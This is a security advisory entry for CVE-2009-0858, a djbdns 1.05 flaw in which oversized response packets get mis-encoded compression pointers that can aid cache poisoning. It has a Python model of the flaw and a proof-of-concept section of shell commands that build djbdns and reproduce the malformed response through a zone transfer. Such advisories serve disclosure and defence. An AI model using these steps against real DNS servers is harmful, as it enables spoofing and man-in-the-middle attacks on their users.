djbdns Oversized Response Packet Remote Cache Poisoning Vulnerability

Vulnerability ID: 1117427
Vulnerability type: input validation
Published: 2009-02-27
Updated: 2009-07-15
CVE: CVE-2009-0858
CNNVD ID: CNNVD-200903-185
Platform: Linux
CVSS score: 5.8
|Vulnerability source
https://www.exploit-db.com/exploits/32825
https://www.securityfocus.com/bid/33937
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-185
|Vulnerability details
djbdns is a lightweight DNS server written by the author of Qmail. The file response.c in djbdns handles name compression. Line 12 of that file annotates the name_ptr array as "each <16384", but response_addname() does not enforce this limit. If the first suffix of a name encoded into the packet sits at an offset of 16384 bytes or more, response_addname() mis-encodes the offset of that name and produces a malformed response packet. Such a response gives the querying client misleading information, which helps an attacker carry out man-in-the-middle and other network spoofing attacks.
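The following Python model is an added illustration of the compression logic the advisory describes; it is not djbdns's own response.c. A compression pointer is 0xC000 plus a 14-bit offset, so an offset of 16384 or more no longer fits in 16 bits and the bytes written are parsed as something else. The enforce_limit flag, the 16 KiB of filler bytes and the name www.example.com are constructed for this example.

```python
import struct

MAX_PTR = 16384  # compression offsets are 14-bit, so they must be < 16384

def add_name(msg, table, name, enforce_limit):
    """Append `name` to `msg`, compressing any suffix already in `table`
    (suffix -> offset). enforce_limit=False mirrors the unchecked behaviour
    the advisory describes: offsets >= 16384 are remembered and reused."""
    out = bytearray(msg)
    labels = name.rstrip(".").split(".")
    while labels:
        suffix = ".".join(labels)
        if suffix in table:
            off = table[suffix]
            # 0xC000 + off only fits in 16 bits when off < 16384; a larger
            # offset wraps and the two pointer flag bits are lost
            out += struct.pack(">H", (0xC000 + off) & 0xFFFF)
            return bytes(out)
        if not enforce_limit or len(out) < MAX_PTR:
            table[suffix] = len(out)  # fixed variant: only record usable offsets
        out += bytes([len(labels[0])]) + labels[0].encode("ascii")
        labels = labels[1:]
    out += b"\x00"
    return bytes(out)

def decode_name(msg, off, depth=0):
    """Parse a (possibly compressed) name at msg[off:] as a resolver would."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels)
        if length & 0xC0 == 0xC0:
            if depth > 16:
                raise ValueError("compression pointer loop")
            ptr = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            return ".".join(labels + [decode_name(msg, ptr, depth + 1)])
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length

def demo(enforce_limit):
    """Write www.example.com twice after 16 KiB of constructed filler (standing
    in for earlier response data); return what a resolver reads for the second
    copy, plus the raw bytes that were emitted for it."""
    table = {}
    msg = add_name(b"\x00" * MAX_PTR, table, "www.example.com", enforce_limit)
    second = len(msg)
    msg = add_name(msg, table, "www.example.com", enforce_limit)
    return decode_name(msg, second), msg[second:]
```

With the limit unchecked, the second copy is emitted as the two bytes 00 00, which a resolver reads as the root name rather than www.example.com; with the limit enforced the name is written inline again and decodes correctly.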
|Vulnerability EXP
source: http://www.securityfocus.com/bid/33937/info

The 'djbdns' package is prone to a remote cache-poisoning vulnerability.

An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

This issue affects djbdns 1.05; other versions may also be vulnerable.

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com
|Affected products
djbdns djbdns 1.05
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0
|References

Source: MISC
Link: http://securityandthe.net/2009/03/05/security-issue-in-djbdns-confirmed/
Source: XF
Name: djbdns-response-packet-spoofing(49003)
Link: http://xforce.iss.net/xforce/xfdb/49003
Source: BID
Name: 33937
Link: http://www.securityfocus.com/bid/33937
Source: BUGTRAQ
Name: 20090305 Re: djbdns misformats some long response packets; patch and example attack
Link: http://www.securityfocus.com/archive/1/archive/1/501479/100/0/threaded
Source: BUGTRAQ
Name: 20090228 Re: djbdns misformats some long response packets; patch and example attack
Link: http://www.securityfocus.com/archive/1/archive/1/501340/100/0/threaded
Source: BUGTRAQ
Name: 20090226 djbdns misformats some long response packets; patch and example attack
Link: http://www.securityfocus.com/archive/1/archive/1/501294/100/0/threaded
Source: DEBIAN
Name: DSA-1831
Link: http://www.debian.org/security/2009/dsa-1831
Source: SECUNIA
Name: 35820
Link: http://secunia.com/advisories/35820
Source: MLIST
Name: [dns] 20090304 djbdns <= 1.05 lets AXFRed subdomains overwrite domains
Link: http://marc.info/?l=djbdns&m=123613000920446&w=2
Source: MLIST
Name: [dns] 20090225 djbdns